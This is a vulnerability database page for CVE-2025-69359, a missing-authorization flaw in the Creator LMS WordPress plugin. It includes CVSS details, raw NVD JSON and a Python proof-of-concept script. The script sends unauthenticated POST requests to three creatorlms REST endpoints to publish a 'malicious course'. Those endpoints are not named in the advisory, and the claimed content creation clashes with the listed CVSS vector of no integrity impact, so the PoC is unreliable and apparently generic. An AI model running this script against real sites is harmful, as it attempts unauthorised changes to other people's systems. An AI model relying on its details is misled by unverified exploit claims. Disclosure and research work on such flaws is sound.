Security Vulnerability Report
中文
CVE-2025-69359 CVSS 5.3 MEDIUM

CVE-2025-69359

Published: 2026-01-06 17:15:48
Last Modified: 2026-04-27 19:16:43

Description

Missing Authorization vulnerability in WPFunnels Creator LMS creatorlms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Creator LMS: from n/a through <= 1.1.12.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Creator LMS <= 1.1.12 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-69359 PoC - Missing Authorization in Creator LMS # Target: WordPress site with Creator LMS plugin <= 1.1.12 target = "http://target-wordpress-site.com" # Unauthenticated access to protected course creation endpoint endpoints = [ "/wp-json/creatorlms/v1/courses", "/wp-json/creatorlms/v1/lessons", "/wp-json/creatorlms/v1/quiz" ] headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } # Malicious course creation payload malicious_payload = { "title": "Malicious Course - Unauthorized Access", "description": "This course was created without proper authorization", "status": "publish", "price": 0 } print("[*] Testing CVE-2025-69359 - Missing Authorization in Creator LMS") print(f"[*] Target: {target}") for endpoint in endpoints: url = target + endpoint print(f"\n[*] Testing endpoint: {endpoint}") try: # Attempt to create resource without authentication response = requests.post(url, json=malicious_payload, headers=headers, timeout=10) if response.status_code in [200, 201]: print(f"[!] VULNERABLE: Successfully accessed {endpoint} without authentication") print(f"[!] Response: {response.text[:200]}") elif response.status_code == 401: print(f"[-] Protected: {endpoint} requires authentication") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] Scan completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69359", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:48.440", "lastModified": "2026-04-27T19:16:43.067", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPFunnels Creator LMS creatorlms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Creator LMS: from n/a through <= 1.1.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}